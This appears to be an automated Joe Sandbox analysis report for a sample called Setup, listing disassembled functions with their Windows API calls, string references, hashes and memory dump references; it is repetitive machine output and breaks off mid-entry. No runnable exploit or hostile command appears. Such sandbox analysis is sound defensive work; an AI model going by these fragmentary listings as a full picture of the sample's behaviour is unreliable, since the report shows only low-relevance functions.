Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: DeleteDirectoryFileRemove
String ID: &_'
API String ID: 3325800564-2411122644
Opcode ID: cdde794274683cf6534bdf1b3a9aaf94cce2202cd248860db14824900008cf3f
Instruction ID: 4cac7708b8ebe92501b61f83c8579993247f666ebc0ec2e9478003ce3f283df1
Opcode Fuzzy Hash: cdde794274683cf6534bdf1b3a9aaf94cce2202cd248860db14824900008cf3f
Instruction Fuzzy Hash: 8731AC32A05925EFC711DF9CC988A6DFBB4FF05720F158259E819A76A1CB70E901CBC1

Function 0070A7B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0070A7FA

Strings

&_', xrefs: 0070A890
&_', xrefs: 0070A7C4

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: &_'$&_'
API String ID: 885266447-224754792
Opcode ID: 8255504f4ff411ad7d736624edf9e9ffda43b6d5dac308ff0ed2364b40db29cb
Instruction ID: 6d6a772f814bef3342e8bf12bbb634761466911f8342b8fdf49dfc49b5aecd33
Opcode Fuzzy Hash: 8255504f4ff411ad7d736624edf9e9ffda43b6d5dac308ff0ed2364b40db29cb
Instruction Fuzzy Hash: 504114B1D04659EFCB08CFA8D844AAEBBB4FF48314F10821EE815A7790DB746A45CF94

Function 0092CFF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,0092D49C,00000000,?,00000000,0091D722,00000000,00000000), ref: 0092D0A3
GetLastError.KERNEL32(?,0092D49C,00000000,?,00000000,0091D722,00000000,00000000,?,00000000,?,0090FAC5,0091D722,00000000,0090FAC5,?), ref: 0092D0C9

Strings

&_', xrefs: 0092D008

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: &_'
API String ID: 442123175-2411122644
Opcode ID: 14ba3ad6b10cf169603bcbe1322523d25478b3cfbae5c279aaae5d27fdf6a5c5
Instruction ID: e68ff0df491d15c9d7e0f4e98bf0d1af3e248bb077d98acc62d20adb1ae73f03
Opcode Fuzzy Hash: 14ba3ad6b10cf169603bcbe1322523d25478b3cfbae5c279aaae5d27fdf6a5c5
Instruction Fuzzy Hash: B2218271A012299BCF14CF59EC81AE9B3B9FF48314F1445AAE909D7260D730DE86CA90

Function 0092CF1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,0092D4C7,00000000,?,00000000,0091D722,00000000,00000000), ref: 0092CFBA
GetLastError.KERNEL32(?,0092D4C7,00000000,?,00000000,0091D722,00000000,00000000,?,00000000,?,0090FAC5,0091D722,00000000,0090FAC5,?), ref: 0092CFE0

Strings

&_', xrefs: 0092CF2D

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: &_'
API String ID: 442123175-2411122644
Opcode ID: a5ac419c3a1443b5eb56891ad054cba530d7d52960890ff71420537e6910c50d
Instruction ID: 8c751f59b48e23ef44fc7faa027dc7634611f7accacd48ec10040a6cda68bbde
Opcode Fuzzy Hash: a5ac419c3a1443b5eb56891ad054cba530d7d52960890ff71420537e6910c50d
Instruction Fuzzy Hash: 49219E71A002299FCF15CF29ED80AEDB7BAAF49305F1041A9E906D7215D630DE42CF60

Function 0072AF00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 0072AFB6
std::_Throw_Cpp_error.LIBCPMT ref: 0072AFC1

Part of subcall function 0090EB9E: ReleaseSRWLockExclusive.KERNEL32(?,?,0090E728,00A63000,275F26E1,?,?,?,?,00000000,009A5004,000000FF,?,006EF9E0,?,00000001), ref: 0090EBB2

Strings

&_', xrefs: 0072AF14

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
String ID: &_'
API String ID: 3666349979-2411122644
Opcode ID: c58b09bdf79738ee46ec3fd8f3cac7f3df8fa249b9ae82480cdf69d3b651546a
Instruction ID: 6745b2b92570e17c100581f67b041c35a4b385dafbcbe0f80e79168f8c1cbf67
Opcode Fuzzy Hash: c58b09bdf79738ee46ec3fd8f3cac7f3df8fa249b9ae82480cdf69d3b651546a
Instruction Fuzzy Hash: AB21D572900714EFDB10DF54DD05B5AB7B8FB85724F104A2AF815877C0EB79E902CA81

Function 006F60C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000002), ref: 006F6151
IsWindow.USER32(00000002), ref: 006F6168

Strings

&_', xrefs: 006F60D4

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Window
String ID: &_'
API String ID: 2353593579-2411122644
Opcode ID: e7724c5f2b209c45b871535e766bb4589dcd71459ddf7404cb6417bca507bee7
Instruction ID: 66456668bfcfbd6e095fa468cf3933d7a22ac946ed4189a36f3125c04dbf5037
Opcode Fuzzy Hash: e7724c5f2b209c45b871535e766bb4589dcd71459ddf7404cb6417bca507bee7
Instruction Fuzzy Hash: B4218B71604609ABCB04DF69DC55BAAFBB6FF44720F00822DF925976A1DB31A915CBC0

Function 006EA5A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00910D99: EnterCriticalSection.KERNEL32(00A669F8,?,?,?,006EA5D7,00000000,275F26E1,?,?,?,?,\\.\pipe\ToServer,0093CAE0,000000FF,?,006EA7B0), ref: 00910DA4
Part of subcall function 00910D99: LeaveCriticalSection.KERNEL32(00A669F8,?,006EA5D7,00000000,275F26E1,?,?,?,?,\\.\pipe\ToServer,0093CAE0,000000FF,?,006EA7B0,00000000,?), ref: 00910DD0

FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,275F26E1,?,?,?,?,\\.\pipe\ToServer,0093CAE0,000000FF,?,006EA7B0,00000000), ref: 006EA5F6

Part of subcall function 006EA660: LoadResource.KERNEL32(00000000,00000000,275F26E1,00000001,00000000,?,00000000,0093C410,000000FF,?,006EA60C,00000000,?,?,\\.\pipe\ToServer,0093CAE0), ref: 006EA68B
Part of subcall function 006EA660: LockResource.KERNEL32(00000000,?,006EA60C,00000000,?,?,\\.\pipe\ToServer,0093CAE0,000000FF,?,006EA7B0,00000000,?,?,0088A498,\\.\pipe\ToServer), ref: 006EA696
Part of subcall function 006EA660: SizeofResource.KERNEL32(00000000,00000000,?,006EA60C,00000000,?,?,\\.\pipe\ToServer,0093CAE0,000000FF,?,006EA7B0,00000000,?,?,0088A498), ref: 006EA6A4

Strings

\\.\pipe\ToServer, xrefs: 006EA5B0
&_', xrefs: 006EA5B5

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Resource$CriticalSection$EnterFindLeaveLoadLockSizeof
String ID: \\.\pipe\ToServer$&_'
API String ID: 529824247-2941616534
Opcode ID: 1bde5c982d512b24245626d4a4c7ae0a781e008f2a51fd19dfb0317806165c31
Instruction ID: c69780c6c1c15dfffb485d43a61483574ff0fa238c1db4398c4febc7e524fab4
Opcode Fuzzy Hash: 1bde5c982d512b24245626d4a4c7ae0a781e008f2a51fd19dfb0317806165c31
Instruction Fuzzy Hash: 3D11EB76B047145FD7258B9AAC41B7AF7E9EB85B64F04013EED06D3380EA75AC008691

Function 007DE770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000004), ref: 007DE7BA
DestroyWindow.USER32(00000004,?,?,?,?,?,?,?,?,000000FF), ref: 007DE7C7

Strings

&_', xrefs: 007DE786

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Window$Destroy
String ID: &_'
API String ID: 3707531092-2411122644
Opcode ID: de1ff8ecb33828403c85315c2f462e847823c2cb1bcac895cbd675dbb19ffe5b
Instruction ID: 1959430de35f6f686c4c66a111a18cfe648774ee69ca6b6a0aab3b6066f1ae82
Opcode Fuzzy Hash: de1ff8ecb33828403c85315c2f462e847823c2cb1bcac895cbd675dbb19ffe5b
Instruction Fuzzy Hash: 0B319A70805B89EFCB01DF69C90978EFBF4BF21314F10866DE45997691CB74AA08DB85

Function 00728E70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 00728F16
std::_Throw_Cpp_error.LIBCPMT ref: 00728F21

Part of subcall function 0090EB9E: ReleaseSRWLockExclusive.KERNEL32(?,?,0090E728,00A63000,275F26E1,?,?,?,?,00000000,009A5004,000000FF,?,006EF9E0,?,00000001), ref: 0090EBB2

Strings

&_', xrefs: 00728E86

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
String ID: &_'
API String ID: 3666349979-2411122644
Opcode ID: 23c9ef43a5f718ce175b2bac45c00513a93bbbd29462d796655c3ac0851a02dc
Instruction ID: 57c64c567cf288484288c70f79f2e12b4d52b75d1624f407a4ab4238417e64ca
Opcode Fuzzy Hash: 23c9ef43a5f718ce175b2bac45c00513a93bbbd29462d796655c3ac0851a02dc
Instruction Fuzzy Hash: 32110172900618EFCB10DF64DD01BDFBBB9FF44314F10462AF81197281EB76AA168BA1

Function 0072AA20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 0072AAC9
std::_Throw_Cpp_error.LIBCPMT ref: 0072AAD4

Part of subcall function 0090EB9E: ReleaseSRWLockExclusive.KERNEL32(?,?,0090E728,00A63000,275F26E1,?,?,?,?,00000000,009A5004,000000FF,?,006EF9E0,?,00000001), ref: 0090EBB2

Strings

&_', xrefs: 0072AA36

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
String ID: &_'
API String ID: 3666349979-2411122644
Opcode ID: 34de1ea05e40eaaabb20f6a17f106d8bebf6504f77447aa1e7cbca711c040904
Instruction ID: 7b35c1f0825126d8e94e56cc5161098703b34c87a32520788b9591bc6f597a4d
Opcode Fuzzy Hash: 34de1ea05e40eaaabb20f6a17f106d8bebf6504f77447aa1e7cbca711c040904
Instruction Fuzzy Hash: 9E11BE32900218EFDB10DF64DD01B9FBBB9FF48314F104A19F91597281E779A915CB91

Function 0070CAF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000411,00000000,0000002C), ref: 0070CB4C

Strings

,, xrefs: 0070CB1C
&_', xrefs: 0070CAF3

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: MessageSend
String ID: ,$&_'
API String ID: 3850602802-3464354696
Opcode ID: f612972f128c399becbbca58a3d6bea9edb48d9e6e6b056310d0fdef5495ae64
Instruction ID: da578a4d8063a8e452127cc5425e8db45a69135347f1022873a021eff3d9a030
Opcode Fuzzy Hash: f612972f128c399becbbca58a3d6bea9edb48d9e6e6b056310d0fdef5495ae64
Instruction Fuzzy Hash: AF012CB0605345DBE719CB28C941B5AB7E5BB88304F44CB6DF94AC7291D778E805CF85

Function 0071EC00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000411,00000000,?), ref: 0071EC5C

Strings

,, xrefs: 0071EC54
&_', xrefs: 0071EC03

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: MessageSend
String ID: ,$&_'
API String ID: 3850602802-3464354696
Opcode ID: d6ca1e8de183fd122581015c9206d2abefe6623a4610344ee4e0ce83379d55e4
Instruction ID: 75eeec03d672d6a7a859ded974ac4d655abf2b9b29bd3a843cc73783de39f370
Opcode Fuzzy Hash: d6ca1e8de183fd122581015c9206d2abefe6623a4610344ee4e0ce83379d55e4
Instruction Fuzzy Hash: 3E0104B16043019FE720DF18C885B9BF7E4AB89710F50492EE986922A0D2B4E884CF92

Function 006E12D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00A6D6DC,00000000,275F26E1,?,00940659,000000FF), ref: 006E1314
GetLastError.KERNEL32(?,00940659,000000FF), ref: 006E131E

Strings

&_', xrefs: 006E12E1

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpin
String ID: &_'
API String ID: 439134102-2411122644
Opcode ID: 4b44b9c529b4cc2aed703b5b50a477ad3c6b87afc91569dea6295c8622fc2a67
Instruction ID: 77160f82a08174dc96ac2864aa799d2e1b3da19533ef1d9c359216bc2ebfba05
Opcode Fuzzy Hash: 4b44b9c529b4cc2aed703b5b50a477ad3c6b87afc91569dea6295c8622fc2a67
Instruction Fuzzy Hash: F901A2B1A58748EBD710CF95FC09B5977B8F705718F104259E429DB7D0D7B990018B50

Function 006FCD60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00A669F8,00000000,275F26E1,006E0000,Function_0025C660,000000FF,?,00910D19,?,?,?,006E7B4A), ref: 006FCD85
GetLastError.KERNEL32(?,00910D19,?,?,?,006E7B4A), ref: 006FCD8F

Strings

&_', xrefs: 006FCD71

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpin
String ID: &_'
API String ID: 439134102-2411122644
Opcode ID: d1fe20e40d6c959daf78afac7a1916187a99be73d8a7f703f7ebdaf06329b9a2
Instruction ID: 68e6388ccca6cc7015d68b14d3ca5b674317071464d353f4166c2f6c47a7a560
Opcode Fuzzy Hash: d1fe20e40d6c959daf78afac7a1916187a99be73d8a7f703f7ebdaf06329b9a2
Instruction Fuzzy Hash: B1F05472648A489BC714CF65ED01B76B7E8FB09B24F00466EF819D7780DB3994008694

Function 00710769 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

GetParent.USER32(0000000F), ref: 0071079C

Strings

Unknown exception, xrefs: 00710771
C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h, xrefs: 00710781

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Parent
String ID: C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h$Unknown exception
API String ID: 975332729-9186675
Opcode ID: 4f879dee485e71503d6dd07a88f7592fd7eb62c615673a14a7ce328b5f2c2206
Instruction ID: 793c63623f6f974619649f973b85170c4bf57c87ea206783723cfd2da91523d1
Opcode Fuzzy Hash: 4f879dee485e71503d6dd07a88f7592fd7eb62c615673a14a7ce328b5f2c2206
Instruction Fuzzy Hash: 1F01E830945288EEDB01EBE8C9197DDBFB1AF61304F648099E0416B286DBB55A48E792

Function 00910C95 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,0090F938,?,?,?,?,0086045D), ref: 00910CCD
GetSystemTimeAsFileTime.KERNEL32(?,275F26E1,00000000,?,009A50B2,000000FF,?,0090F938,?,?,?,?,0086045D), ref: 00910CD1

Strings

&_', xrefs: 00910CA7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Time$FileSystem$Precise
String ID: &_'
API String ID: 743729956-2411122644
Opcode ID: 053a32f9c9c7258e00e2ba39528286f010ed681b633031af056265b5645590ea
